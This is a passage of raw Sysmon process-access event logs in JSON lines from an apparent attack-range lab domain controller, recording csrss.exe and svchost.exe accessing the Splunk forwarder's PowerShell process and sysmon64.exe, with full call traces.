C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02F8-5F25-0000-00107E330600}","TargetProcessId":"3384","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4219,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4220,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4221,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4222,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4223,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4224,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4225,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:52.966","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:52","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4226,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:52.966\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 